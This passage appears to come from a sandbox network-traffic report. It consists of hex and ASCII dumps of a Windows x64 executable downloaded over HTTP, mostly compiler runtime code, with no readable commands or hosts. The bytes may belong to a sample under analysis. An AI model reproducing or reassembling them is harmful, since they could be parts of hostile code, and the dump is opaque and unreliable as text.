                                                2022-05-23 06:34:53 UTC34INData Raw: 70 1f 02 00 48 c7 04 01 00 00 00 00 e9 71 ff ff ff c7 44 24 20 00 00 00 00 eb 0a 8b 44 24 20 ff c0 89 44 24 20 83 7c 24 20 24 7d 54 48 63 44 24 20 48 6b c0 10 48 8d 0d 38 1f 02 00 48 83 3c 01 00 74 3b 48 63 44 24 20 48 6b c0 10 48 8d 0d 21 1f 02 00 83 7c 01 08 01 75 24 48 63 44 24 20 48 6b c0 10 48 8d 0d 0a 1f 02 00 48 8b 04 01 48 89 44 24 30 48 8b 4c 24 30 ff 15 76 8f 01 00 eb 9b 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 89 4c 24 08 48 83 ec 38 c7 44 24 28 01 00 00 00 48 83 3d 20 39 02 00 00 75 19 e8 61 38 00 00 b9 1e 00 00 00 e8 07 39 00 00 b9 ff 00 00 00 e8 dd e2 ff ff 48 63 44 24 40 48 6b c0 10 48 8d 0d 9d 1e 02 00 48 83 3c 01 00 74 0a b8 01 00 00 00 e9 ce 00 00 00 41 b9 16 01 00 00 4c 8d 05 7f a4 01 00 ba 02 00 00 00 b9 28 00 00 00
                                                Data Ascii: pHqD$ D$ D$ |$ $}THcD$ HkH8H<t;HcD$ HkH!|u$HcD$ HkHHHD$0HL$0vHHL$H8D$(H= 9ua89HcD$@HkHH<tAL(
                                                2022-05-23 06:34:53 UTC36INData Raw: 38 00 0f 85 ba 00 00 00 48 8b 44 24 50 48 83 b8 20 01 00 00 00 74 38 48 8b 44 24 50 48 8b 80 20 01 00 00 83 38 00 75 27 ba 02 00 00 00 48 8b 44 24 50 48 8b 88 20 01 00 00 e8 5d bc ff ff 48 8b 44 24 50 48 8b 88 28 01 00 00 e8 0c 4c 00 00 48 8b 44 24 50 48 83 b8 18 01 00 00 00 74 38 48 8b 44 24 50 48 8b 80 18 01 00 00 83 38 00 75 27 ba 02 00 00 00 48 8b 44 24 50 48 8b 88 18 01 00 00 e8 16 bc ff ff 48 8b 44 24 50 48 8b 88 28 01 00 00 e8 e5 4a 00 00 ba 02 00 00 00 48 8b 44 24 50 48 8b 88 10 01 00 00 e8 ef bb ff ff ba 02 00 00 00 48 8b 44 24 50 48 8b 88 28 01 00 00 e8 d9 bb ff ff 48 8b 44 24 50 48 83 b8 30 01 00 00 00 0f 84 84 00 00 00 48 8b 44 24 50 48 8b 80 30 01 00 00 83 38 00 75 73 48 8b 44 24 50 48 8b 80 38 01 00 00 48 2d fe 00 00 00 ba 02 00 00 00 48 8b
                                                Data Ascii: 8HD$PH t8HD$PH 8u'HD$PH ]HD$PH(LHD$PHt8HD$PH8u'HD$PHHD$PH(JHD$PHHD$PH(HD$PH0HD$PH08usHD$PH8H-H
                                                2022-05-23 06:34:53 UTC37INData Raw: 65 63 65 0d 0a 02 00 48 39 44 24 20 74 62 48 83 7c 24 20 00 74 33 48 8b 44 24 20 b9 ff ff ff ff f0 0f c1 08 ff c9 8b c1 85 c0 75 1d 48 8d 05 99 1b 02 00 48 39 44 24 20 74 0f ba 02 00 00 00 48 8b 4c 24 20 e8 83 b7 ff ff 48 8b 44 24 28 48 8b 0d a7 1f 02 00 48 89 88 b8 00 00 00 48 8b 05 99 1f 02 00 48 89 44 24 20 48 8b 44 24 20 f0 ff 00 b9 0d 00 00 00 e8 82 f7 ff ff eb 11 48 8b 44 24 28 48 8b 80 b8 00 00 00 48 89 44 24 20 48 83 7c 24 20 00 75 0a b9 20 00 00 00 e8 cd d4 ff ff 48 8b 44 24 20 48 83 c4 38 c3 cc cc cc 89 4c 24 08 56 57 48 81 ec 68 02 00 00 c7 44 24 38 ff ff ff ff e8 d6 a3 ff ff 48 89 44 24 30 e8 dc fe ff ff 48 8b 44 24 30 48 8b 80 b8 00 00 00 48 89 44 24 28 8b 8c 24 80 02 00 00 e8 cf 02 00 00 89 84 24 80 02 00 00 48 8b 44 24 28 8b 40 04 39 84 24
                                                Data Ascii: eceH9D$ tbH|$ t3HD$ uHH9D$ tHL$ HD$(HHHHD$ HD$ HD$(HHD$ H|$ u HD$ H8L$VWHhD$8HD$0HD$0HHD$($$HD$(@9$
                                                2022-05-23 06:34:53 UTC38INData Raw: eb d9 c7 44 24 20 00 00 00 00 eb 0a 8b 44 24 20 ff c0 89 44 24 20 83 7c 24 20 04 0f 83 b9 00 00 00 8b 44 24 24 48 6b c0 30 48 8d 0d 83 1a 02 00 48 03 c8 48 8b c1 8b 4c 24 20 48 8d 44 c8 10 48 89 44 24 28 eb 0e 48 8b 44 24 28 48 83 c0 02 48 89 44 24 28 48 8b 44 24 28 0f b6 00 85 c0 74 75 48 8b 44 24 28 0f b6 40 01 85 c0 74 68 48 8b 44 24 28 0f b6 00 89 44 24 30 eb 0a 8b 44 24 30 ff c0 89 44 24 30 48 8b 44 24 28 0f b6 40 01 39 44 24 30 77 3c 8b 44 24 30 ff c0 8b c0 8b 4c 24 20 48 8d 15 04 1a 02 00 0f be 0c 0a 48 8b 94 24 88 00 00 00 0f b6 44 02 1c 0b c1 8b 4c 24 30 ff c1 8b c9 48 8b 94 24 88 00 00 00 88 44 0a 1c eb ab e9 71 ff ff ff e9 32 ff ff ff 48 8b 84 24 88 00 00 00 8b 8c 24 80 00 00 00 89 48 04 48 8b 84 24 88 00 00 00 c7 40 08 01 00 00 00 48 8b 84 24
                                                Data Ascii: D$ D$ D$ |$ D$$Hk0HHHL$ HDHD$(HD$(HHD$(HD$(tuHD$(@thHD$(D$0D$0D$0HD$(@9D$0w<D$0L$ HH$DL$0H$Dq2H$$HH$@H$
                                                2022-05-23 06:34:53 UTC40INData Raw: 00 85 c0 0f 84 e7 02 00 00 c7 84 24 70 05 00 00 00 00 00 00 eb 10 8b 84 24 70 05 00 00 ff c0 89 84 24 70 05 00 00 81 bc 24 70 05 00 00 00 01 00 00 73 18 8b 84 24 70 05 00 00 0f b6 8c 24 70 05 00 00 88 8c 04 70 04 00 00 eb cb c6 84 24 70 04 00 00 20 48 8d 84 24 7e 05 00 00 48 89 84 24 60 04 00 00 eb 14 48 8b 84 24 60 04 00 00 48 83 c0 02 48 89 84 24 60 04 00 00 48 8b 84 24 60 04 00 00 0f b6 00 85 c0 74 4c 48 8b 84 24 60 04 00 00 0f b6 00 89 84 24 70 05 00 00 eb 10 8b 84 24 70 05 00 00 ff c0 89 84 24 70 05 00 00 48 8b 84 24 60 04 00 00 0f b6 40 01 39 84 24 70 05 00 00 77 11 8b 84 24 70 05 00 00 c6 84 04 70 04 00 00 20 eb ca eb 91 c7 44 24 38 00 00 00 00 48 8b 84 24 b0 05 00 00 8b 40 0c 89 44 24 30 48 8b 84 24 b0 05 00 00 8b 40 04 89 44 24 28 48 8d 44 24 60
                                                Data Ascii: $p$p$p$ps$p$pp$p H$~H$`H$`HH$`H$`tLH$`$p$p$pH$`@9$pw$pp D$8H$@D$0H$@D$(HD$`
                                                2022-05-23 06:34:53 UTC41INData Raw: 31 62 39 39 0d 0a c3 cc cc cc cc cc cc cc cc 48 83 ec 28 83 3d 2d 3d 02 00 00 75 14 b9 fd ff ff ff e8 b9 f1 ff ff c7 05 17 3d 02 00 01 00 00 00 33 c0 48 83 c4 28 c3 cc cc cc cc cc cc cc cc 89 4c 24 08 48 83 ec 38 e8 e3 00 00 00 8b 4c 24 40 89 08 8b 4c 24 40 e8 14 00 00 00 89 44 24 20 e8 9b 00 00 00 8b 4c 24 20 89 08 48 83 c4 38 c3 89 4c 24 08 48 83 ec 18 c7 04 24 00 00 00 00 eb 08 8b 04 24 ff c0 89 04 24 48 63 04 24 48 83 f8 2d 73 27 48 63 04 24 48 8d 0d 92 11 02 00 8b 04 c1 39 44 24 20 75 11 48 63 04 24 48 8d 0d 7e 11 02 00 8b 44 c1 04 eb 3b eb c7 83 7c 24 20 13 72 10 83 7c 24 20 24 77 09 b8 0d 00 00 00 eb 24 eb 22 81 7c 24 20 bc 00 00 00 72 13 81 7c 24 20 ca 00 00 00 77 09 b8 08 00 00 00 eb 07 eb 05 b8 16 00 00 00 48 83 c4 18 c3 cc cc cc cc cc cc cc cc
                                                Data Ascii: 1b99H(=-=u=3H(L$H8L$@L$@D$ L$ H8L$H$$$Hc$H-s'Hc$H9D$ uHc$H~D;|$ r|$ $w$"|$ r|$ wH
                                                2022-05-23 06:34:53 UTC42INData Raw: fb ff ff c7 00 00 00 00 00 83 bc 24 40 12 00 00 02 75 11 48 8d 05 bc 8f 01 00 48 89 84 24 c8 11 00 00 eb 0f 48 8d 05 a8 8f 01 00 48 89 84 24 c8 11 00 00 48 8b 84 24 60 12 00 00 0f be 00 85 c0 74 12 48 8b 84 24 60 12 00 00 48 89 84 24 d0 11 00 00 eb 0f 48 8d 05 78 8f 01 00 48 89 84 24 d0 11 00 00 48 8b 84 24 60 12 00 00 0f be 00 85 c0 74 1b 83 bc 24 40 12 00 00 02 75 11 48 8d 05 43 8f 01 00 48 89 84 24 d8 11 00 00 eb 0f 48 8d 05 3f 8f 01 00 48 89 84 24 d8 11 00 00 48 8b 84 24 60 12 00 00 0f be 00 85 c0 74 11 48 8d 05 0c 8f 01 00 48 89 84 24 e0 11 00 00 eb 0f 48 8d 05 10 8f 01 00 48 89 84 24 e0 11 00 00 48 83 bc 24 50 12 00 00 00 74 12 48 8b 84 24 50 12 00 00 48 89 84 24 e8 11 00 00 eb 0f 48 8d 05 e4 8e 01 00 48 89 84 24 e8 11 00 00 48 83 bc 24 50 12 00 00
                                                Data Ascii: $@uHH$HH$H$`tH$`H$HxH$H$`t$@uHCH$H?H$H$`tHH$HH$H$PtH$PH$HH$H$P
                                                2022-05-23 06:34:53 UTC43INData Raw: 20 00 00 33 c9 ff 15 e2 6c 01 00 85 c0 75 46 4c 8d 05 b7 90 01 00 ba 04 01 00 00 48 8d 8c 24 b0 20 00 00 e8 35 61 00 00 48 c7 44 24 28 00 00 00 00 c7 44 24 20 3c 01 00 00 4c 8d 0d 3d 88 01 00 4c 8d 05 5e 90 01 00 48 8d 15 ef 8f 01 00 8b c8 e8 b8 ca ff ff 48 8d 84 24 b0 20 00 00 48 89 84 24 98 00 00 00 48 8b 8c 24 98 00 00 00 e8 9b 60 00 00 48 83 f8 40 0f 86 93 00 00 00 48 8b 8c 24 98 00 00 00 e8 84 60 00 00 48 8b 8c 24 98 00 00 00 48 8d 44 41 80 48 89 84 24 98 00 00 00 48 8d 84 24 b0 20 00 00 48 8b 8c 24 98 00 00 00 48 2b c8 48 8b c1 48 d1 f8 b9 04 01 00 00 48 2b c8 48 8b c1 48 d1 e0 41 b9 06 00 00 00 4c 8b 05 23 08 02 00 48 8b d0 48 8b 8c 24 98 00 00 00 e8 0b 5a 00 00 48 c7 44 24 28 00 00 00 00 c7 44 24 20 45 01 00 00 4c 8d 0d 83 87 01 00 4c 8d 05 a4 8f
                                                Data Ascii: 3luFLH$ 5aHD$(D$ <L=L^HH$ H$H$`H@H$`H$HDAH$H$ H$H+HHH+HHAL#HH$ZHD$(D$ ELL
                                                2022-05-23 06:34:53 UTC45INData Raw: 04 75 07 b8 01 00 00 00 eb 02 33 c0 48 8b 8c 24 28 23 00 00 48 33 cc e8 28 78 ff ff 48 81 c4 38 23 00 00 c3 48 89 54 24 10 48 89 4c 24 08 48 83 ec 58 48 83 7c 24 60 00 74 0a c7 44 24 44 01 00 00 00 eb 08 c7 44 24 44 00 00 00 00 8b 44 24 44 89 44 24 40 83 7c 24 40 00 75 2e 48 8d 05 d2 8b 01 00 48 89 44 24 20 45 33 c9 41 b8 48 00 00 00 48 8d 15 4d 8b 01 00 b9 02 00 00 00 e8 f3 f8 ff ff 83 f8 01 75 03 cc 33 c0 83 7c 24 40 00 75 3b e8 5f f0 ff ff c7 00 16 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 48 00 00 00 4c 8d 05 13 8b 01 00 48 8d 15 ec 8a 01 00 48 8d 0d 75 8b 01 00 e8 70 02 00 00 33 c0 e9 ba 00 00 00 48 83 7c 24 68 e0 76 12 e8 1c f0 ff ff c7 00 0c 00 00 00 33 c0 e9 a0 00 00 00 48 83 7c 24 68 00 75 09 48 c7 44 24 68 01 00 00 00 4c 8b 44 24 60 33 d2 48 8b
                                                Data Ascii: u3H$(#H3(xH8#HT$HL$HXH|$`tD$DD$DD$DD$@|$@u.HHD$ E3AHHMu3|$@u;_HD$ AHLHHup3H|$hv3H|$huHD$hLD$`3H
                                                2022-05-23 06:34:53 UTC46INData Raw: 30 06 00 00 89 84 24 64 05 00 00 48 8b 84 24 18 06 00 00 48 89 84 24 70 05 00 00 ff 15 ca 60 01 00 89 44 24 50 33 c9 ff 15 b6 60 01 00 48 8d 4c 24 40 ff 15 a3 60 01 00 89 84 24 50 05 00 00 83 bc 24 50 05 00 00 00 75 1d 83 7c 24 50 00 75 16 83 bc 24 20 06 00 00 ff 74 0c 8b 8c 24 20 06 00 00 e8 95 cd ff ff 48 8b 8c 24 00 06 00 00 48 33 cc e8 75 72 ff ff 48 81 c4 10 06 00 00 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 38 c7 44 24 20 00 00 00 00 48 83 7c 24 40 00 75 02 eb 3b 4c 8b 44 24 40 33 d2 48 8b 0d bf 0a 02 00 ff 15 99 61 01 00 89 44 24 20 83 7c 24 20 00 75 1c ff 15 70 60 01 00 8b c8 e8 39 ea ff ff 89 44 24 24 e8 c0 ea ff ff 8b 4c 24 24 89 08 48 83 c4 38 c3 cc cc cc cc cc 48 83 ec 38 c7 44 24 20 fe ff ff ff 45 33 c0 33 d2 48 8b 0d
                                                Data Ascii: 0$dH$H$p`D$P3`HL$@`$P$Pu|$Pu$ t$ H$H3urH_HL$H8D$ H|$@u;LD$@3HaD$ |$ up`9D$$L$$H8H8D$ E33H
                                                2022-05-23 06:34:53 UTC47INData Raw: e0 1f e9 71 ff ff ff 66 66 66 0f 1f 84 00 00 00 00 00 66 90 48 81 fa 00 10 00 00 72 b5 b8 20 00 00 00 0f 18 04 0a 0f 18 44 0a 40 48 81 c1 80 00 00 00 ff c8 75 ec 48 81 e9 00 10 00 00 b8 40 00 00 00 4c 8b 0c 0a 4c 8b 54 0a 08 4c 0f c3 09 4c 0f c3 51 08 4c 8b 4c 0a 10 4c 8b 54 0a 18 4c 0f c3 49 10 4c 0f c3 51 18 4c 8b 4c 0a 20 4c 8b 54 0a 28 48 83 c1 40 4c 0f c3 49 e0 4c 0f c3 51 e8 4c 8b 4c 0a f0 4c 8b 54 0a f8 ff c8 4c 0f c3 49 f0 4c 0f c3 51 f8 75 aa 49 81 e8 00 10 00 00 49 81 f8 00 10 00 00 0f 83 71 ff ff ff f0 80 0c 24 00 e9 b9 fe ff ff 66 66 66 66 0f 1f 84 00 00 00 00 00 66 66 66 90 66 66 66 90 66 90 49 03 c8 49 83 f8 08 72 61 f6 c1 07 74 36 f6 c1 01 74 0b 48 ff c9 0d 0a
                                                Data Ascii: qffffHr D@HuH@LLTLLQLLLTLILQLL LT(H@LILQLLLTLILQuIIq$fffffffffffIIrat6tH
                                                2022-05-23 06:34:53 UTC47INData Raw: 64 32 30 0d 0a 8a 04 0a 49 ff c8 88 01 f6 c1 02 74 0f 48 83 e9 02 66 8b 04 0a 49 83 e8 02 66 89 01 f6 c1 04 74 0d 48 83 e9 04 8b 04 0a 49 83 e8 04 89 01 4d 8b c8 49 c1 e9 05 75 50 4d 8b c8 49 c1 e9 03 74 14 48 83 e9 08 48 8b 04 0a 49 ff c9 48 89 01 75 f0 49 83 e0 07 4d 85 c0 75 07 49 8b c3 c3 0f 1f 00 48 ff c9 8a 04 0a 49 ff c8 88 01 75 f3 49 8b c3 c3 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 66 66 66 90 66 66 90 49 81 f9 00 20 00 00 73 42 48 8b 44 0a f8 4c 8b 54 0a f0 48 83 e9 20 48 89 41 18 4c 89 51 10 48 8b 44 0a 08 4c 8b 14 0a 49 ff c9 48 89 41 08 4c 89 11 75 d5 49 83 e0 1f e9 73 ff ff ff 66 66 66 66 0f 1f 84 00 00 00 00 00 66 90 48 81 fa 00 f0 ff ff 77 b5 b8 20 00 00 00 48 81 e9 80 00 00 00 0f 18 04 0a 0f 18 44 0a 40 ff c8 75 ec 48 81 c1 00 10 00
                                                Data Ascii: d20ItHfIftHIMIuPMItHHIHuIMuIHIuIffffffffffffI sBHDLTH HALQHDLIHALuIsfffffHw HD@uH
                                                2022-05-23 06:34:53 UTC51INData Raw: 31 66 38 33 0d 0a ff ff 83 bc 24 80 00 00 00 08 75 16 48 8b 44 24 38 8b 90 b0 00 00 00 b9 08 00 00 00 ff 54 24 30 eb 0b 8b 8c 24 80 00 00 00 ff 54 24 30 83 bc 24 80 00 00 00 08 74 14 83 bc 24 80 00 00 00 0b 74 0a 83 bc 24 80 00 00 00 04 75 2a 48 8b 44 24 38 48 8b 4c 24 40 48 89 88 a8 00 00 00 83 bc 24 80 00 00 00 08 75 0f 48 8b 44 24 38 8b 4c 24 58 89 88 b0 00 00 00 33 c0 48 83 c4 78 c3 4a d0 00 00 ea d0 00 00 9a d0 00 00 c2 d0 00 00 72 d0 00 00 3e d1 00 00 00 05 01 05 02 05 01 05 05 01 05 05 05 03 05 05 05 05 05 04 02 cc cc cc cc cc cc cc 48 89 54 24 10 89 4c 24 08 48 83 ec 18 48 8b 44 24 28 48 89 04 24 48 8b 04 24 8b 4c 24 20 39 48 04 74 2a 48 8b 04 24 48 83 c0 10 48 89 04 24 48 63 05 d6 62 01 00 48 6b c0 10 48 8b 4c 24 28 48 03 c8 48 8b c1 48 39 04 24
                                                Data Ascii: 1f83$uHD$8T$0$T$0$t$t$u*HD$8HL$@H$uHD$8L$X3HxJr>HT$L$HHD$(H$H$L$ 9Ht*H$HH$HcbHkHL$(HHH9$
                                                2022-05-23 06:34:53 UTC55INData Raw: 28 e8 bb 6f ff ff 48 8b 44 24 30 48 8b 0d ff da 01 00 48 39 48 30 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 30 e8 96 6f ff ff 48 8b 44 24 30 48 8b 0d e2 da 01 00 48 39 48 38 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 38 e8 71 6f ff ff 48 8b 44 24 30 48 8b 0d c5 da 01 00 48 39 48 40 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 40 e8 4c 6f ff ff 48 8b 44 24 30 48 8b 0d a8 da 01 00 48 39 48 48 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 48 e8 27 6f ff ff 48 8b 44 24 30 48 8b 0d a3 da 01 00 48 39 48 68 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 68 e8 02 6f ff ff 48 8b 44 24 30 48 8b 0d 86 da 01 00 48 39 48 70 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 70 e8 dd 6e ff ff 48 8b 44 24 30 48 8b 0d 69 da 01 00 48 39 48 78 74 13 ba 02 00 00 00 48 8b 44 24
                                                Data Ascii: (oHD$0HH9H0tHD$0HH0oHD$0HH9H8tHD$0HH8qoHD$0HH9H@tHD$0HH@LoHD$0HH9HHtHD$0HHH'oHD$0HH9HhtHD$0HHhoHD$0HH9HptHD$0HHpnHD$0HiH9HxtHD$
                                                2022-05-23 06:34:53 UTC59INData Raw: 31 62 65 34 0d 0a 39 01 00 00 48 89 84 24 80 00 00 00 eb 0c 48 c7 84 24 80 00 00 00 00 00 00 00 48 8b 84 24 80 00 00 00 48 89 44 24 40 48 83 7c 24 40 00 75 0a e9 e1 00 00 00 e9 dc 00 00 00 8b 44 24 5c 89 44 24 28 48 8b 44 24 40 48 89 44 24 20 44 8b 4c 24 58 4c 8b 44 24 50 8b 94 24 b0 00 00 00 8b 8c 24 a8 00 00 00 ff 15 24 2f 01 00 85 c0 75 0a e9 a3 00 00 00 e9 9e 00 00 00 83 bc 24 d0 00 00 00 00 75 4d 48 c7 44 24 38 00 00 00 00 48 c7 44 24 30 00 00 00 00 c7 44 24 28 00 00 00 00 48 c7 44 24 20 00 00 00 00 44 8b 4c 24 5c 4c 8b 44 24 40 33 d2 8b 8c 24 d8 00 00 00 ff 15 18 2e 01 00 89 44 24 48 83 7c 24 48 00 75 04 eb 4b eb 49 eb 47 48 c7 44 24 38 00 00 00 00 48 c7 44 24 30 00 00 00 00 8b 84 24 d0 00 00 00 89 44 24 28 48 8b 84 24 c8 00 00 00 48 89 44 24 20 44
                                                Data Ascii: 1be49H$H$H$HD$@H|$@uD$\D$(HD$@HD$ DL$XLD$P$$$/u$uMHD$8HD$0D$(HD$ DL$\LD$@3$.D$H|$HuKIGHD$8HD$0$D$(H$HD$ D
                                                2022-05-23 06:34:53 UTC63INData Raw: c7 84 24 50 10 00 00 ff ff ff ff e9 81 09 00 00 48 83 bc 24 30 81 00 00 00 0f 84 fc 00 00 00 e8 1a a8 ff ff 8b 00 89 84 24 74 70 00 00 e8 0c a8 ff ff c7 00 00 00 00 00 48 8b 84 24 38 81 00 00 48 89 44 24 20 4c 8b 8c 24 30 81 00 00 41 b8 eb 0f 00 00 ba 00 10 00 00 48 8d 8c 24 70 50 00 00 e8 d9 88 00 00 89 84 24 70 70 00 00 83 bc 24 70 70 00 00 00 7d 47 e8 c3 a7 ff ff 48 c7 44 24 38 00 00 00 00 c7 44 24 30 03 02 00 00 48 8d 0d 1b 5e 01 00 48 89 4c 24 28 48 8d 0d 0f 6a 01 00 48 89 4c 24 20 4c 8d 0d 13 30 01 00 41 b8 22 00 00 00 ba 16 00 00 00 8b 08 e8 f1 6a ff ff e8 7c a7 ff ff 8b 8c 24 74 70 00 00 89 08 83 bc 24 70 70 00 00 00 7d 46 4c 8d 05 f2 3e 01 00 ba 00 10 00 00 48 8d 8c 24 70 50 00 00 e8 60 12 00 00 48 c7 44 24 28 00 00 00 00 c7 44 24 20 06 02 00 00
                                                Data Ascii: $PH$0$tpH$8HD$ L$0AH$pP$pp$pp}GHD$8D$0H^HL$(HjHL$ L0A"j|$tp$pp}FL>H$pP`HD$(D$
                                                2022-05-23 06:34:53 UTC66INData Raw: 31 30 34 39 0d 0a 00 48 89 84 24 80 00 00 00 48 83 7c 24 78 00 74 59 48 83 bc 24 80 00 00 00 00 74 4e ff 54 24 78 48 89 44 24 50 48 83 7c 24 50 00 74 35 48 8d 44 24 68 48 89 44 24 20 41 b9 0c 00 00 00 4c 8d 44 24 40 ba 01 00 00 00 48 8b 4c 24 50 ff 94 24 80 00 00 00 85 c0 74 0b 8b 44 24 48 83 e0 01 85 c0 75 08 c7 44 24 6c 01 00 00 00 83 7c 24 6c 00 74 17 8b 84 24 d0 00 00 00 0f ba e8 15 89 84 24 d0 00 00 00 e9 81 00 00 00 48 8b 44 24 30 48 39 05 2d c5 01 00 74 2c 48 8b 0d 24 c5 01 00 ff 15 f6 11 01 00 48 89 84 24 88 00 00 00 48 83 bc 24 88 00 00 00 00 74 0c ff 94 24 88 00 00 00 48 89 44 24 58 48 83 7c 24 58 00 74 3f 48 8b 44 24 30 48 39 05 f3 c4 01 00 74 31 48 8b 0d ea c4 01 00 ff 15 b4 11 01 00 48 89 84 24 90 00 00 00 48 83 bc 24 90 00 00 00 00 74 11 48
                                                Data Ascii: 1049H$H|$xtYH$tNT$xHD$PH|$Pt5HD$hHD$ ALD$@HL$P$tD$HuD$l|$lt$$HD$0H9-t,H$H$H$t$HD$XH|$Xt?HD$0H9t1HH$H$tH
                                                2022-05-23 06:34:53 UTC70INData Raw: 66 63 63 0d 0a 48 89 4c 24 08 48 83 ec 18 33 c0 85 c0 74 29 48 8b 44 24 20 48 8b 00 48 83 c0 08 48 8b 4c 24 20 48 89 01 48 8b 44 24 20 48 8b 00 48 8b 40 f8 48 8b 00 48 89 04 24 eb 24 48 8b 44 24 20 48 8b 00 48 83 c0 08 48 8b 4c 24 20 48 89 01 48 8b 44 24 20 48 8b 00 48 8b 40 f8 48 89 04 24 48 8b 04 24 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 18 33 c0 85 c0 74 29 48 8b 44 24 20 48 8b 00 48 83 c0 08 48 8b 4c 24 20 48 89 01 48 8b 44 24 20 48 8b 00 48 8b 40 f8 0f b7 00 66 89 04 24 eb 24 48 8b 44 24 20 48 8b 00 48 83 c0 08 48 8b 4c 24 20 48 89 01 48 8b 44 24 20 48 8b 00 0f b7 40 f8 66 89 04 24 0f b7 04 24 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc 4c 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 57 48 81 ec 90 00
                                                Data Ascii: fccHL$H3t)HD$ HHHL$ HHD$ HH@HH$$HD$ HHHL$ HHD$ HH@H$H$HHL$H3t)HD$ HHHL$ HHD$ HH@f$$HD$ HHHL$ HHD$ H@f$$HLL$ LD$HT$HL$WH
                                                2022-05-23 06:34:53 UTC74INData Raw: 31 32 37 63 0d 0a 00 00 00 ff ff ff 7f 74 5e 48 83 bc 24 a8 00 00 00 01 76 53 48 8b 84 24 a8 00 00 00 48 ff c8 48 39 05 ae 81 01 00 73 0e 48 8b 05 a5 81 01 00 48 89 44 24 58 eb 10 48 8b 84 24 a8 00 00 00 48 ff c8 48 89 44 24 58 48 8b 44 24 58 48 d1 e0 48 8b 8c 24 a0 00 00 00 48 83 c1 02 4c 8b c0 ba fe 00 00 00 e8 dd 03 ff ff 48 83 bc 24 b0 00 00 00 00 74 0a c7 44 24 60 01 00 00 00 eb 08 c7 44 24 60 00 00 00 00 8b 44 24 60 89 44 24 44 83 7c 24 44 00 75 2e 48 8d 05 d2 27 01 00 48 89 44 24 20 45 33 c9 41 b8 13 00 00 00 48 8d 15 75 48 01 00 b9 02 00 00 00 e8 8b 84 ff ff 83 f8 01 75 03 cc 33 c0 83 7c 24 44 00 75 3e e8 f7 7b ff ff c7 00 16 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 13 00 00 00 4c 8d 05 3b 48 01 00 48 8d 15 14 48 01 00 48 8d 0d 75 27 01 00 e8 08
                                                Data Ascii: 127ct^H$vSH$HH9sHHD$XH$HHD$XHD$XHH$HLH$tD$`D$`D$`D$D|$Du.H'HD$ E3AHuHu3|$Du>{HD$ AL;HHHHu'
                                                2022-05-23 06:34:53 UTC78INData Raw: 01 00 00 e9 a4 01 00 00 48 8b 84 24 a0 00 00 00 83 78 0c 00 75 58 48 8b 84 24 a0 00 00 00 8b 00 25 ff ff ff 1f 3d 21 05 93 19 0f 82 7c 01 00 00 48 8b 84 24 a0 00 00 00 83 78 20 00 74 1b e8 52 a7 ff ff 48 8b 8c 24 a0 00 00 00 48 63 49 20 48 03 c1 48 89 44 24 60 eb 09 48 c7 44 24 60 00 00 00 00 48 83 7c 24 60 00 0f 84 3e 01 00 00 48 8b 84 24 80 00 00 00 81 38 63 73 6d e0 0f 85 d4 00 00 00 48 8b 84 24 80 00 00 00 83 78 18 03 0f 82 c2 00 00 00 48 8b 84 24 80 00 00 00 81 78 20 22 05 93 19 0f 86 ad 00 00 00 48 8b 84 24 80 00 00 00 48 8b 40 30 83 78 08 00 74 1f e8 f5 a6 ff ff 48 8b 8c 24 80 00 00 00 48 8b 49 30 48 63 49 08 48 03 c1 48 89 44 24 68 eb 09 48 c7 44 24 68 00 00 00 00 48 8b 44 24 68 48 89 44 24 50 48 83 7c 24 50 00 74 61 0f b6 84 24 b8 00 00 00 89 44
                                                Data Ascii: H$xuXH$%=!|H$x tRH$HcI HHD$`HD$`H|$`>H$8csmH$xH$x "H$H@0xtH$HI0HcIHHD$hHD$hHD$hHD$PH|$Pta$D
                                                2022-05-23 06:34:53 UTC78INData Raw: 65 64 66 0d 0a ff ff 89 44 24 60 4c 8d 4c 24 68 4c 8b 84 24 30 01 00 00 48 8b 94 24 28 01 00 00 48 8b 8c 24 18 01 00 00 e8 f0 a3 ff ff 4c 8b 84 24 30 01 00 00 48 8b 94 24 28 01 00 00 48 8b 8c 24 18 01 00 00 e8 43 fb ff ff 39 44 24 60 7e 43 44 8b 4c 24 60 4c 8b 84 24 30 01 00 00 48 8b 94 24 28 01 00 00 48 8d 4c 24 68 e8 7e fa ff ff 44 8b 4c 24 60 4c 8b 84 24 30 01 00 00 48 8b 94 24 28 01 00 00 48 8b 8c 24 18 01 00 00 e8 8c fa ff ff eb 21 4c 8b 84 24 30 01 00 00 48 8b 94 24 28 01 00 00 48 8b 8c 24 18 01 00 00 e8 dd fa ff ff 89 44 24 60 83 7c 24 60 ff 7c 13 48 8b 84 24 30 01 00 00 8b 40 04 39 44 24 60 7d 02 eb 05 e8 ca 8d ff ff 48 8b 84 24 10 01 00 00 81 38 63 73 6d e0 0f 85 ce 01 00 00 48 8b 84 24 10 01 00 00 83 78 18 04 0f 85 bc 01 00 00 48 8b 84 24 10 01
                                                Data Ascii: edfD$`LL$hL$0H$(H$L$0H$(H$C9D$`~CDL$`L$0H$(HL$h~DL$`L$0H$(H$!L$0H$(H$D$`|$`|H$0@9D$`}H$8csmH$xH$
